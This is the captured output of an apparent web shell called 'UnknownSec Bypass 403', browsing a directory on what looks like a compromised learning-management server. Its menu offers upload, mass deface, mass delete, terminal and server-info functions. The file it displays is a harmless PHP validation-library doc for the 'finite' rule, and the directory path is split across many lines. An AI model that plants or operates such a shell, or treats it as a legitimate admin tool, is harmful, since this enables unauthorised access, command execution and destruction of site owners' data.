UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_a852e4e4c22f
/
vendor
/
respect
/
validation
/
docs
/
rules
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
Finite.md
# Finite - `v::finite()` Validates if the input is a finite number. ```php v::finite()->validate('10'); // true v::finite()->validate(10); // true ``` *** See also: * [Digit](Digit.md) * [Infinite](Infinite.md) * [IntVal](IntVal.md) * [Numeric](Numeric.md)
Copyright © 2026 - UnknownSec